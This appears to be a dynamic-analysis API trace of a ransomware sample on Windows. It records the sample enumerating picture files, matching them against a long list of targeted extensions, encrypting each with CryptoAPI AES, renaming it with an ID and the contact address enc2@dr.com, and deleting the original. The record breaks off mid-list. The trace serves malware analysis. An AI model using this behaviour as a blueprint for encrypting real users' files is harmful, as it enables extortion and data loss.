	[0176.891] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.891] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0176.893] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\user account pictures\\user-192.png.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 105
	[0176.893] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user-192.png.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-192.png.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0176.893] WriteFile (in: hFile=0x390, lpBuffer=0xfdd5e8*, nNumberOfBytesToWrite=0x970, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfdd5e8*, lpNumberOfBytesWritten=0x18b358*=0x970, lpOverlapped=0x0) returned 1
	[0176.896] CloseHandle (hObject=0x390) returned 1
	[0176.896] CloseHandle (hObject=0x388) returned 1
	[0176.896] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user-192.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-192.png")) returned 1
	[0176.900] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user-192.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-192.png")) returned 0
	[0176.900] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19f, dwReserved0=0x0, dwReserved1=0x0, cFileName="user-32.png", cAlternateFileName="")) returned 1
	[0176.900] lstrcmpW (lpString1="user-32.png", lpString2="..") returned 1
	[0176.900] lstrcmpW (lpString1="user-32.png", lpString2=".") returned 1
	[0176.900] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\"
	[0176.900] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpString2="user-32.png" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-32.png") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-32.png"
	[0176.900] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-32.png") returned 62
	[0176.948] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.949] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-32.png", cchLength=0x3e | out: lpsz="c:\\users\\all users\\microsoft\\user account pictures\\user-32.png") returned 0x3e
	[0176.949] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.949] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\user-32.png", lpSrch="help_decrypt_your_files") returned 0x0
	[0176.949] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\user account pictures\\user-32.png" | out: lpString1="c:\\users\\all users\\microsoft\\user account pictures\\user-32.png") returned="c:\\users\\all users\\microsoft\\user account pictures\\user-32.png"
	[0176.949] lstrlenW (lpString="c:\\users\\all users\\microsoft\\user account pictures\\user-32.png") returned 62
	[0176.949] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.950] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.950] StrStrW (lpFirst=".png", lpSrch=".") returned=".png"
	[0176.950] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.950] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".png") returned=".png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0176.951] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.951] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.951] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user-32.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-32.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0176.953] ReadFile (in: hFile=0x388, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x19f, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x18b350*=0x19f, lpOverlapped=0x0) returned 1
	[0176.957] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.957] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcba18) returned 1
	[0176.959] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.960] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0176.960] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.960] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0176.960] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.960] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9430) returned 1
	[0176.960] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.961] CryptEncrypt (in: hKey=0xfb9430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x19f, dwBufLen=0x19f | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x1a0) returned 1
	[0176.961] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.961] RtlMoveMemory (in: Destination=0xfdc770, Source=0xfdcd58, Length=0x19f | out: Destination=0xfdc770) 
	[0176.961] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.961] CryptEncrypt (in: hKey=0xfb9430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc770*, pdwDataLen=0x18aefc*=0x19f, dwBufLen=0x1a0 | out: pbData=0xfdc770*, pdwDataLen=0x18aefc*=0x1a0) returned 1
	[0176.962] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.962] CryptDestroyKey (hKey=0xfb9430) returned 1
	[0176.962] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.963] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0176.963] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.963] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0176.963] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.001] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.002] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.002] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0177.003] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\user account pictures\\user-32.png.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 104
	[0177.003] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user-32.png.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-32.png.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0177.004] WriteFile (in: hFile=0x390, lpBuffer=0xfdc770*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfdc770*, lpNumberOfBytesWritten=0x18b358*=0x1a0, lpOverlapped=0x0) returned 1
	[0177.007] CloseHandle (hObject=0x390) returned 1
	[0177.007] CloseHandle (hObject=0x388) returned 1
	[0177.008] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user-32.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-32.png")) returned 1
	[0177.012] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\user account pictures\\user-32.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-32.png")) returned 0
	[0177.012] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="user-40.png", cAlternateFileName="")) returned 1
	[0177.012] lstrcmpW (lpString1="user-40.png", lpString2="..") returned 1
	[0177.013] lstrcmpW (lpString1="user-40.png", lpString2=".") returned 1
	[0177.013] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\"
	[0177.013] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\", lpString2="user-40.png" | out: lpString1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-40.png") returned="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-40.png"
	[0177.013] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-40.png") returned 62
	[0177.013] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.013] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-40.png", cchLength=0x3e | out: lpsz="c:\\users\\all users\\microsoft\\user account pictures\\user-40.png") returned 0x3e
	[0177.014] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.014] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\user account pictures\\user-40.png", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.014] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\user account pictures\\user-40.png" | out: lpString1="c:\\users\\all users\\microsoft\\user account pictures\\user-40.png") returned="c:\\users\\all users\\microsoft\\user account pictures\\user-40.png"
	[0177.014] lstrlenW (lpString="c:\\users\\all users\\microsoft\\user account pictures\\user-40.png") returned 62
	[0177.014] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.014] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.015] StrStrW (lpFirst=".png", lpSrch=".") returned=".png"
	[0177.015] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.015] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.u